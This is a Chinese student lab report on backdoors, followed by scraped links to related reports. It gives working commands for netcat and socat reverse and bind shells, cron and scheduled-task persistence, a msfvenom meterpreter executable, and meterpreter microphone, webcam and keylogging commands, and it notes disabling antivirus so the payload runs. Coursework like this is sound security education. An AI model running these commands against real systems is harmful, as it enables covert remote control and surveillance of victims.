20165306 Exp2 后门原理与实践

实验内容

(1)使用netcat获取主机操作Shell,cron启动

(2)使用socat获取主机操作Shell, 任务计划启动

(3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

(4)使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

基础问题回答

(1)例举你能想到的一个后门进入到你系统中的可能方式?

下载的软件有后门

(2)例举你知道的后门如何启动起来(win及linux)的方式?

win:设置为开机自启动

Linux:将木马设为定时启动

(3)Meterpreter有哪些给你映像深刻的功能?

竟然可以获取目标主机音频、摄像头、击键记录等内容

(4)如何发现自己有系统有没有被安装后门?

安装专门的杀毒软件,实时防护,并定期检测电脑安全情况


一、后门概念

  • 后门就是不经过正常认证流程而访问系统的通道。

  • 相对狭义一点的后门的概念:后门特指潜伏于操作系统中专门做后门的一个程序,“坏人”可以连接这个程序,远程执行各种指令,概念和木马有重叠。

二、常用后门工具

关于netcat

又名nc、ncat,是一个底层工具,进行基本的TCP UDP数据收发。常被与其他工具结合使用,起到后门的作用。

(一)Win获得Linux Shell

1.在Windows下使用ipconfig查看本机IP为192.168.199.175

2.使用ncat.exe程序监听本机的5306端口ncat.exe -l -p 5306

3.在Kali环境下,安装ncat,使用nc指令的-e选项反向连接Windows主机的5306端口

nc 192.168.199.175 5306 -e /bin/sh

4.成功获得Kali的shell,可运行任何指令,如ls

(二)Linux获得Windows Shell

1.在Kali环境中使用ifconfig查看IP为192.168.95.136

2.使用nc指令监听5306端口nc -l -p 5306

3.在Windows下,使用ncat.exe程序的-e选项项反向连接Kali主机的5306端口

ncat.exe -e cmd.exe 192.168.95.136 5306

4.Kali下可以看到Windows的命令提示

(三)使用nc传输数据

1.Windows下监听5306端口ncat.exe -l 5306

2.Kali下连接到Windows的5306端口ncat 192.168.199.175 5306

3.建立连接之后,在Kali中输入数据,按下回车,Windows中就可以显示传输的数据了

三、Meterpreter

  • 后门就是一个程序。

  • 传统的理解是:有人编写一个后门程序,大家拿来用。

  • 一个平台能生成后门程序。这个平台把后门的基本功能(基本的连接、执行指令),
    扩展功能(如搜集用户信息、安装服务等功能),
    编码模式,
    运行平台,
    以及运行参数
    全都做成零件或可调整的参数。用的时候按需要组合,就可以生成一个可执行文件。

  • 接下来学习如何使用msfenom生成后门可执行文件,要生成的这个后门程序是Meterpreter。

  • 参数说明:

    • -p 使用的payload。payload翻译为有效载荷,就是被运输有东西。这里windows/meterpreter/reverse_tcp就是一段shellcode

    • -x使用的可执行文件模板,payload(shellcode)就写入到这个可执行文件中

    • -e 使用的编码器,用于对shellcode变形,为了免杀

    • -i 编码器的迭代次数。如上即使用该编码器编码5次

    • -b badchar是payload中需要去除的字符

    • LHOST是反弹回连的IP

    • LPORT 是回连的端口

    • -f 生成文件的类型

    • > 输出到哪个文件

(一)使用netcat获取主机操作Shell,cron启动

1.在Windows系统下,监听5306端口nc -l -p 5306

2.Kali下用crontab -e指令编辑一条定时任务,选择编辑器3

3.按i进入插入模式,在最后一行添加52 * * * * /bin/netcat 172.168.199.175 5306 -e /bin/sh,意思是在每个小时的第52分钟反向连接Windows主机的5306端口

4.当时间到了12:52时,此时已经获得了Kali的shell,可以在Windows下输入指令ls

(二)使用socat获取主机操作Shell, 任务计划启动

socat

socat是ncat的增强版,它使用的格式是socat [options] <address> <address>,其中两个address是必选项,而options是可选项。
socat的基本功能就是建立两个双向的字节流,数据就在其间传输,参数address代表其中的一个方向。所谓流,代表数据的流向,而数据则可以有许多不同的类型,命令中也就相应需要许多选项对各种不同的类型数据流进行限定与说明。

实验步骤

1.搜索计算机管理任务计划程序创建任务

常规任务名称socat_5306

触发器新建开始任务选择工作站锁定时确定

操作程序或脚本点击浏览→选择socat.exe的路径→添加参数填写tcp-listen:5306 exec:cmd.exe,pty,stderr,把cmd.exe绑定到端口5306,同时把cmd.exestderr重定向到stdout上→确定

2.创建完成之后,按Windows+L快捷键锁定计算机,再次打开时,可以发现之前创建的任务显示正在运行

3.在Kali下输入socat - tcp:192.168.199.175:5306,这里的第一个参数-代表标准的输入输出,第二个流连接到Windows主机的5306端口,此时可以发现已经成功获得了一个cmd shell

(三)使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

1.Kali下输入指令

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.95.136 LPORT=5306 -f exe > 20165306_backdoor.exe生成后门程序

  • 注:这里的IP地址为控制端IP,即Kali的IP

2.Windows下输入ncat.exe -lv 5306 > 20165306_backdoor.exe,通过nc指令将生成的后门程序传送到Windows主机上

3.Kali下输入nc 192.168.199.175 5306 < 20165306_backdoor.exe

  • 注:这里的IP地址为被控主机IP,即Windows的IP

Windows显示连接成功

4.Kali下使用msfconsole指令进入msf控制台

5.使用监听模块,设置payload,设置反弹回连的IP和端口

  • 注:set LHOST用的是Kali的IP,和生成后门程序时指定的IP相同

设置完成后,执行监听

6.运行Windows下的后门程序20165306_backdoor.exe

7.此时Kali上已经获得了Windows主机的连接,并且得到了远程控制的shell

(四)使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容

1.使用record_mic指令可以截获一段音频

2.先打开Windows相机功能,Kali下使用webcam_snap指令可以使用摄像头进行拍照

3.使用screenshot指令可以进行截屏

4.使用keyscan_start指令开始记录下击键的过程,使用keyscan_dump指令读取击键的记录

四、遇到的问题

1.socat任务创建完成之后,按Windows+L快捷键锁定计算机,再次打开时,发现之前创建的任务显示准备就绪,而不是正在运行

解决:右击→运行

2.使用MSF meterpreter生成可执行文件时IP地址输错

解决:控制端和被控主机不要弄混,控制端--Kali,被控主机--Windows

3.运行Windows下的后门程序20165306_backdoor.exe时显示拒绝访问

解决:关闭“病毒和威胁防护”和“防火墙和网络保护”

20165306 Exp2 后门原理与实践的更多相关文章

  1. 2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践 1. 后门原理与实践实验说明及预备知识 一.实验说明 任务一:使用netcat获取主机操作Shell,cron启动 ( ...

  2. 20155324《网络对抗》Exp2 后门原理与实践

    20155324<网络对抗>Exp2 后门原理与实践 20155324<网络对抗>Exp2 后门原理与实践 常用后门工具实践 Windows获得Linux Shell 在Win ...

  3. 2018-2019-2 20165237《网络对抗技术》Exp2 后门原理与实践

    2018-2019-2 20165237<网络对抗技术>Exp2 后门原理与实践 一.实践目标 使用netcat获取主机操作Shell,cron启动 使用socat获取主机操作Shell, ...

  4. 2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践 实验内容(概要): (1)使用netcat获取主机Shell,cron启动 首先两个电脑(虚拟机)都得有netcat, ...

  5. 2018-2019-2 网络对抗技术 20165206 Exp2 后门原理与实践

    - 2018-2019-2 网络对抗技术 20165206 Exp2 后门原理与实践 - 实验任务 (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用socat获取主 ...

  6. 2018-2019-2 网络对抗技术 20165323 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165323 Exp2 后门原理与实践 一.实验要求 (3.5分) (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用soc ...

  7. 2018-2019-2 20165235《网络对抗技术》Exp2 后门原理与实践

    2018-2019-2 20165235<网络对抗技术>Exp2 后门原理与实践 实验内容 1.使用netcat获取主机操作Shell,cron启动 2.使用socat获取主机操作Shel ...

  8. 2018-2019-2 网络对抗技术 20165311 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165311 Exp2 后门原理与实践 后门的基本概念 常用后门工具 netcat Win获得Linux Shell Linux获得Win Shell Met ...

  9. 2018-2019-2 网络对抗技术 20165317 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165317 Exp2 后门原理与实践 基础问题回答 例举你能想到的一个后门进入到你系统中的可能方式? 下载免费应用的时候会有绑定木马. 浏览某些网页时会有内 ...

随机推荐

  1. zabbix自定义监控项、添加图形、设置触发器、远程执行命令

    监控项是在zabbix中手机数据的基础,没有监控项就没有数据,系统自带模板带有大量默认item,自定义item可以定义在模板中,在应用模板即可使用对应item:也可直接在host中定义 目标:自定义监 ...

  2. 温习排序算法(基于C指针)

    以前学过的数据结构课,貌似已经忘得一干二净了,偶然又翻起,书中最后一章详细介绍了7种排序算法,现在对其中4种做个总结.(为啥只总结4种,当然是因为偷懒,只想总结简单又常用的!) 先贴一张排序分类图: ...

  3. python类与对象-如何创建可管理的对象属性

    如何创建可管理的对象属性 问题举例 在面向对象编程中, 我们把方法看作对象的接口, 直接访问对象的属性可能是不安全的,或设计上不够灵活. 但是使用调用方法在形式上不如访问属性简洁. circle.ge ...

  4. js中的this指向问题(小计)

    this的指向在函数定义的时候是确定不了的,只有函数执行的时候才能确定,this最终指向调用它的对象. 1.函数调用模式 当一个函数并非一个对象的属性时,那么它就是被当做函数来调用的.在此种模式下,t ...

  5. caffe-ssd需要安装opencv

    https://blog.csdn.net/xiaxiazls/article/details/52039473

  6. [PHP] 解决人人商城收银台不能上传图片问题

    反正网上一大堆,也不知道哪个版本有修复,反正我的没有修复. 问题报错:ReferenceError: angular is not defined 解决如下: 修改文件:addons/ewei_sho ...

  7. HVP plan

    HVP,hier verification plan,建立整个验证的plan,在验证后期,通过vcs的coverage db可以直接进行反标, 包括反标code coverage,function c ...

  8. 跟我一起学python(1)

    1.变量 定义一个变量  会有三个特征  id,type,value print(id(age),type(age),age) 命名推荐用下划线方式 (尽量用英文  不要过长  意思要明白) numb ...

  9. Vue系列之 => webpack-babel的配置

    安装 cnpm i babel-core@6.26.3 babel-loader@7.0.0 babel-plugin-transform-runtime -D cnpm i babel-preset ...

  10. Linux格式化、挂载及卸载数据盘

    注意: 磁盘分区和格式化是高风险行为,请慎重操作.本文档描述如何处理一个新买的数据盘,如果您的数据盘上有数据,请务必对数据进行备份以避免可能的数据丢失. 服务器仅支持对 数据盘 进行分区,而不支持对  ...